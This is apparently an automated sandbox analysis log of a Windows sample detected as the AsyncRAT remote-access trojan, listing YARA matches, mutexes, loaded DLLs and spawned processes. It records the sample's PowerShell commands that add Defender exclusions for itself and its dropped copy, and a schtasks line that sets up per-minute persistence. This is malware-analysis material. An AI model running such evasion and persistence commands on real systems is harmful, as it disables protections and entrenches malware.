                  Source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeCode function: 0_2_00007FFD9B8812C90_2_00007FFD9B8812C9
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeCode function: 0_2_00007FFD9B889E120_2_00007FFD9B889E12
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeCode function: 0_2_00007FFD9B8890660_2_00007FFD9B889066
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeCode function: 0_2_00007FFD9B881C5D0_2_00007FFD9B881C5D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B9830E91_2_00007FFD9B9830E9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B9530E94_2_00007FFD9B9530E9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B962E1111_2_00007FFD9B962E11
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeCode function: 16_2_00007FFD9B87155816_2_00007FFD9B871558
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeCode function: 17_2_00007FFD9B8A12C917_2_00007FFD9B8A12C9
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeCode function: 17_2_00007FFD9B8A1C5D17_2_00007FFD9B8A1C5D
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeCode function: 18_2_00007FFD9B8812C918_2_00007FFD9B8812C9
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeCode function: 18_2_00007FFD9B881C5D18_2_00007FFD9B881C5D
                  Source: fjijTlM2tu.exe, 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecargame.exe4 vs fjijTlM2tu.exe
                  Source: fjijTlM2tu.exe, 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecargame.exe4 vs fjijTlM2tu.exe
                  Source: fjijTlM2tu.exeBinary or memory string: OriginalFilenamecargame.exe4 vs fjijTlM2tu.exe
                  Source: fjijTlM2tu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: fjijTlM2tu.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.0.fjijTlM2tu.exe.710000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000000.1659315673.0000000000712000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000002.2928111797.0000000012C68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\AppData\Roaming\localsys64.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: fjijTlM2tu.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: fjijTlM2tu.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: fjijTlM2tu.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: localsys64.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: localsys64.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: localsys64.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: fjijTlM2tu.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: fjijTlM2tu.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: localsys64.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: localsys64.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/21@0/1
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile created: C:\Users\user\AppData\Roaming\localsys64.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeMutant created: \Sessions\1\BaseNamedObjects\04UEOrkCj8I1qdBg
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4284:120:WilError_03
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                  Source: fjijTlM2tu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: fjijTlM2tu.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: fjijTlM2tu.exeReversingLabs: Detection: 78%
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile read: C:\Users\user\Desktop\fjijTlM2tu.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\fjijTlM2tu.exe "C:\Users\user\Desktop\fjijTlM2tu.exe"
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\localsys64.exe C:\Users\user\AppData\Roaming\localsys64.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\localsys64.exe "C:\Users\user\AppData\Roaming\localsys64.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\localsys64.exe "C:\Users\user\AppData\Roaming\localsys64.exe"
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fjijTlM2tu.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'fjijTlM2tu.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\localsys64.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'localsys64.exe'Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
